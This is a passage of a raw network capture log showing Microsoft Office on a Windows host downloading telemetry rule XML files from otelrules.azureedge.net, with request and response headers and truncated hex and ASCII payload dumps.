                                                                                                              2024-12-05 09:39:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              123192.168.2.64986513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:06 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:07 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:06 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1399
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                              ETag: "0x8DC582BE976026E"
                                                                                                              x-ms-request-id: 0e3f3dcd-301e-001f-2cd1-45aa3a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093906Z-1746fd949bdkw94lhC1EWRxuz400000002t0000000000gne
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:07 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              124192.168.2.64986713.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:07 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:07 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:07 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1362
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                              ETag: "0x8DC582BDC13EFEF"
                                                                                                              x-ms-request-id: 8c86af4e-801e-00a3-6fcc-457cfb000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093907Z-1746fd949bdb8xvchC1EWRmbd400000002dg000000006kqt
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:07 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              125192.168.2.64986813.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:07 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:08 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:07 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1425
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                              ETag: "0x8DC582BE6BD89A1"
                                                                                                              x-ms-request-id: 6982f097-a01e-0021-7491-46814c000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093907Z-1746fd949bdjzh7thC1EWR3g6400000002m0000000002xt5
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:08 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              126192.168.2.64986913.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:07 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:08 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:07 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1388
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                                              ETag: "0x8DC582BDBD9126E"
                                                                                                              x-ms-request-id: 2b71c36d-501e-008c-14c5-45cd39000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093907Z-1746fd949bdlqd7fhC1EWR6vt000000002q00000000042sy
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:08 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              127192.168.2.64987013.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:07 UTC192OUTGET /rules/rule702501v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:08 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:07 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1415
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:57 GMT
                                                                                                              ETag: "0x8DC582BE7C66E85"
                                                                                                              x-ms-request-id: 1e2a9e05-401e-0078-21cb-454d34000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093907Z-1746fd949bd7wvgbhC1EWR0rgs00000002pg000000000rzm
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:08 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              128192.168.2.64987113.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:08 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:09 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:09 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1378
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                              ETag: "0x8DC582BDB813B3F"
                                                                                                              x-ms-request-id: 00b55cb5-a01e-000d-73cc-45d1ea000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093909Z-1746fd949bdjrnwqhC1EWRpg2800000002fg000000007z8g
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:09 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              129192.168.2.64987213.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:09 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:10 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:09 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1415
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                              ETag: "0x8DC582BDCE9703A"
                                                                                                              x-ms-request-id: 60835f53-401e-000a-55cd-454a7b000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093909Z-1746fd949bdkw94lhC1EWRxuz400000002kg000000008uw2
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:10 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              130192.168.2.64987313.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:09 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:10 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:10 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1405
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                                              ETag: "0x8DC582BE89A8F82"
                                                                                                              x-ms-request-id: 4a855f25-e01e-0099-02ce-45da8a000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093910Z-1746fd949bdmv56chC1EWRypnn00000002r0000000002dsk
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:10 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              131192.168.2.64987513.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:09 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:10 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:10 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1378
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                              ETag: "0x8DC582BE584C214"
                                                                                                              x-ms-request-id: 55570aa3-601e-00ab-51a0-4666f4000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093910Z-1746fd949bd2cq7chC1EWRnx9g000000023g0000000064sh
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:10 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                              132192.168.2.64987413.107.246.63443
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-05 09:39:09 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept-Encoding: gzip
                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                              Host: otelrules.azureedge.net
                                                                                                              2024-12-05 09:39:10 UTC494INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 05 Dec 2024 09:39:10 GMT
                                                                                                              Content-Type: text/xml
                                                                                                              Content-Length: 1368
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                              ETag: "0x8DC582BE51CE7B3"
                                                                                                              x-ms-request-id: 224e79cf-701e-0050-75c2-456767000000
                                                                                                              x-ms-version: 2018-03-28
                                                                                                              x-azure-ref: 20241205T093910Z-1746fd949bd9x4mhhC1EWRb76n00000002k0000000004bvb
                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                              X-Cache: TCP_HIT
                                                                                                              Accept-Ranges: bytes
                                                                                                              2024-12-05 09:39:10 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
